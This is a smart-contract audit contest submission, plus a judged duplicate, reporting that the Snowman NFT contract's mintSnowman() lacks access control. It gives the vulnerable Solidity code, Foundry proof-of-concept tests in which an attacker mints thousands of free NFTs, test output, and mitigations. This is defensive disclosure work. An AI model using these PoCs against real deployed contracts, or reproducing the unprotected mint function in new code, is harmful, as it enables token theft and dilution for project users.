Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

mintSnowman() is callable by any address without restriction, allowing unlimited free NFT minting and bypassing the entire staking mechanism

cybervikink

Root + Impact

Description

The intended flow requires users to acquire Snow tokens (by earning weekly or buying with ETH/WETH), then claim Snowman NFTs through SnowmanAirdrop.claimSnowman(), which burns their Snow balance and mints NFTs proportional to their holdings.

However, Snowman.mintSnowman() is a public entry point with no protection:

// @> No modifier, no access control of any kind
function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood:

  • This is trivially exploitable — calling mintSnowman(attacker, N) requires a single transaction with no preconditions.

  • Any user who discovers the unprotected function can exploit it immediately after contract deployment.

Impact:

  • An attacker mints an unlimited number of Snowman NFTs to any address at zero cost beyond gas.

  • The Snow token's utility (and therefore its value) is destroyed — there is no reason to acquire Snow tokens to earn NFTs when they can be minted freely.

  • Legitimate airdrop recipients' NFTs are diluted to worthlessness by the unlimited supply.

  • The protocol's tokenomics and incentive design are completely broken.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
import {DeploySnowman} from "../script/DeploySnowman.s.sol";
contract FreeNFTMintPoC is Test {
Snowman nft;
function setUp() public {
DeploySnowman deployer = new DeploySnowman();
nft = deployer.run();
}
function testAnyoneCanMintUnlimitedNFTs() public {
address attacker = makeAddr("attacker");
// Attacker holds zero Snow tokens, has no Merkle proof, no signature
// Yet mints 1000 Snowman NFTs in a single call
vm.prank(attacker);
nft.mintSnowman(attacker, 1000);
// All 1000 NFTs minted successfully
assertEq(nft.balanceOf(attacker), 1000);
assertEq(nft.getTokenCounter(), 1000);
}
function testAttackerMintsBeforeLegitimateUser() public {
address attacker = makeAddr("attacker");
address legitimateUser = makeAddr("user");
// Attacker front-runs and mints everything
vm.prank(attacker);
nft.mintSnowman(attacker, 10_000);
// Token counter is now 10_000, all supply stolen
assertEq(nft.getTokenCounter(), 10_000);
// Legitimate user (even through the airdrop contract) gets tokens
// with IDs starting at 10_000 — their expected IDs are all taken
nft.mintSnowman(legitimateUser, 1);
assertEq(nft.ownerOf(10_000), legitimateUser);
}
}

Recommended Mitigation

Restrict mintSnowman() to only be callable by the SnowmanAirdrop contract. The airdrop contract address can be set in the constructor or via a one-time setter:

// In Snowman.sol
address private s_airdropContract;
error SM__NotAllowed();
constructor(string memory _SnowmanSvgUri) ERC721("Snowman Airdrop", "SNOWMAN") Ownable(msg.sender) {
s_TokenCounter = 0;
s_SnowmanSvgUri = _SnowmanSvgUri;
}
// Called once after deployment to wire up the airdrop contract
function setAirdropContract(address _airdrop) external onlyOwner {
if (_airdrop == address(0)) revert SM__NotAllowed();
s_airdropContract = _airdrop;
}
modifier onlyAirdrop() {
if (msg.sender != s_airdropContract) revert SM__NotAllowed();
_;
}
function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 6 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!